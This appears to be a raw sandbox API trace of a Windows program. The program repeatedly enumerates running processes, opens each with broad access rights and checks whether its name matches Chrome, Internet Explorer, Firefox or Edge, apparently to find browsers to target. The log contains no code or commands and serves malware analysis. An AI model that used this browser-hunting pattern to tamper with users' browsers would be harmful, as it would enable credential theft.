	[0219.770] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4c0c
	[0219.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.771] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.771] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.771] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.771] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.772] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0219.772] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x4c10
	[0219.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.773] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0219.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.773] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.831] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0219.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.832] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.832] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0219.833] CloseHandle (hObject=0x188) returned 1
	[0219.833] Sleep (dwMilliseconds=0x64) 
	[0219.931] GetCurrentProcessId () returned 0x110
	[0219.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0219.935] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0219.937] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0219.938] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0219.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4c14
	[0219.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.940] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0219.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.940] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.941] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0219.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.941] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0219.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4c18
	[0219.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.944] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0219.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.944] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.946] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0219.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.946] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.946] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0219.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4c1c
	[0219.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.947] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0219.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.947] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.948] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0219.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.948] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0219.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4c20
	[0219.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.949] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0219.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.950] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.950] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0219.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.951] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.951] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0219.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4c24
	[0219.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.952] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0219.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.952] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.953] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0219.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.953] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.954] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0219.955] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4c28
	[0219.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.955] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0219.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.955] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.956] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0219.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.956] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.956] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0219.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4c2c
	[0219.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.957] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0219.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.957] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.958] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0219.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.958] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.958] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0219.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4c30
	[0219.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.959] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0219.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.959] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.959] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0219.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.960] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.960] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4c34
	[0219.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.961] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.961] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.962] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.962] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.962] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4c38
	[0219.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.963] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.963] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.963] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.964] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.964] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4c3c
	[0219.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.965] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.965] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.966] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.966] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.966] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4c40
	[0219.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.967] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.967] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.968] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.968] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.968] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4c44
	[0219.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.969] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.969] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.970] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.970] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.970] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4c48
	[0219.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.971] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.971] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.972] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.972] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.972] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4c4c
	[0219.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.973] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.973] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.974] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.974] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0219.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4c50
	[0219.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.975] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0219.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.975] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.976] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0219.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.977] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.977] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4c54
	[0219.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.978] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.978] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.979] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.979] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.979] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0219.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4c58
	[0219.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.980] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.980] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.981] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.981] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.981] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0219.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4c5c
	[0219.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.982] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0219.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.982] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.983] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0219.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.983] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.983] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0219.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4c60
	[0219.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.984] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0219.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.984] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.985] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0219.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.985] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.985] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0219.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4c64
	[0219.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.986] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0219.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.986] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.987] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0219.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.987] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0219.987] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0219.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4c68
	[0219.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.988] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0219.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.988] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0219.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0219.989] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0219.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
